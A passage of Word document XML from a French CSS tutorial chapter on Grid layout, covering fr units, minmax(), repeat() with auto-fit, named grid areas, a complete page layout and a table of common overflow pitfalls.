    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>19.2 Unités et fonctions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> représente une fraction de l'espace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>libre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, après déduction des tailles fixes et des espaces. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>minmax()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> borne une piste. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>repeat()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite les répétitions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq écritures de colonnes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.grille-1 { grid-template-columns: 1fr 2fr; }        /* 1/3 et 2/3 */</w:t>
        <w:br/>
        <w:t>.grille-2 { grid-template-columns: 12rem minmax(0, 1fr); }</w:t>
        <w:br/>
        <w:t>.grille-3 { grid-template-columns: repeat(3, minmax(0, 1fr)); }</w:t>
        <w:br/>
        <w:t>.grille-4 { grid-template-columns: repeat(auto-fit, minmax(15rem, 1fr)); }</w:t>
        <w:br/>
        <w:t>.grille-5 { grid-template-columns: subgrid; }             /* héritage de</w:t>
        <w:br/>
        <w:t xml:space="preserve">  pistes */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>minmax(0, 1fr)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est la forme la plus sûre de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1fr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : sans le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, une piste peut dépasser à cause d'un contenu insécable. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>repeat(auto-fit, ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> crée autant de colonnes que la largeur le permet, sans media query.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une galerie qui s'adapte seule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Galerie responsive sans media query */</w:t>
        <w:br/>
        <w:t>.galerie {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: grid;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  grid-template-columns: repeat(auto-fit, minmax(15rem, 1fr));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: 1.25rem;</w:t>
        <w:br/>
        <w:t>}</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`AUTO-FIT` OU `AUTO-FILL` ?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>auto-fit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> étire les pistes existantes pour occuper la largeur ; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>auto-fill</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> conserve des pistes vides. Pour une galerie de cartes, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>auto-fit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> évite les colonnes fantômes ; pour un alignement régulier, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>auto-fill</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> garde la grille stable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>19.3 Placer les éléments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un élément se place par ligne de grille (numérotée), par nom de zone, ou automatiquement dans l'ordre du document. Le placement explicite doit correspondre à l'ordre de lecture : sinon, l'accessibilité en souffre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux façons de placer les mêmes blocs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.entete   { grid-column: 1 / -1; }       /* toute la largeur */</w:t>
        <w:br/>
        <w:t>.contenu  { grid-column: 2; grid-row: 2; }</w:t>
        <w:br/>
        <w:t>.lateral  { grid-column: 1; grid-row: 2; }</w:t>
        <w:br/>
        <w:t>.pied     { grid-column: 1 / -1; grid-row: 3; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Variante par zones nommées */</w:t>
        <w:br/>
        <w:t>.page {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  grid-template-areas:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "entete entete"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "lateral contenu"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "pied   pied";</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.entete  { grid-area: entete; }</w:t>
        <w:br/>
        <w:t>.lateral { grid-area: lateral; }</w:t>
        <w:br/>
        <w:t>.contenu { grid-area: contenu; }</w:t>
        <w:br/>
        <w:t>.pied    { grid-area: pied; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les zones nommées rendent la structure lisible dans le CSS. Elles s'accompagnent naturellement d'un changement de disposition en media query :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Le même conteneur, une autre disposition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@media (max-width: 48rem) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .page {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    grid-template-columns: 1fr;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    grid-template-areas:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "entete"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "contenu"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "lateral"</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "pied";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>19.4 Construire une page complète</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une mise en page classique combine une grille principale, des composants flex et des grilles secondaires. Chaque niveau utilise le modèle le plus simple.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre régions, une grille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&lt;body class="page"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;header class="entete"&gt;...&lt;/header&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;aside class="lateral"&gt;...&lt;/aside&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;main class="contenu"&gt;...&lt;/main&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;footer class="pied"&gt;...&lt;/footer&gt;</w:t>
        <w:br/>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une mise en page complète, en dix lignes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.page {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: grid;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  grid-template-columns: minmax(0, 16rem) minmax(0, 1fr);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  grid-template-rows: auto 1fr auto;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  grid-template-areas:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "entete  entete"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "lateral contenu"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "pied    pied";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: 2rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  min-height: 100dvh;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  max-width: 78rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  margin-inline: auto;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding-inline: clamp(1rem, 4vw, 2.5rem);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.contenu &gt; * + * { margin-block-start: 1.25rem; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.63 — Cinq besoins et leur réponse Grid</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8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Besoin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="360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Solution Grid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Colonne de lecture centrée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>minmax(0, 68ch)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>margin: auto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Limite la mesure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Trois colonnes égales</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repeat(3, minmax(0, 1fr))</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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Évite le débordement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Galerie fluide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>auto-fit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>minmax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucune media query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Tableau de bord</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grid-template-areas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="262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Lisible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Carte avec image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Grid imbriquée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2622"/>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Attention aux </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1fr</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LES GRILLES IMBRIQUÉES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Une grille placée dans une cellule peut déborder si elle contient un élément insécable. Appliquez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>min-width: 0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> aux cellules concernées : c'est la correction la plus fréquente des débordements en Grid.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>19.5 Pièges et diagnostics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Grid est puissant mais punit les approximations. Quatre erreurs expliquent la majorité des mises en page cassées.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.64 — Cinq symptômes de Grid et leur remède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95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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Correction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Colonne qui déborde</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1fr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> sans </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>minmax(0, …)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>
            <w:tcMar>
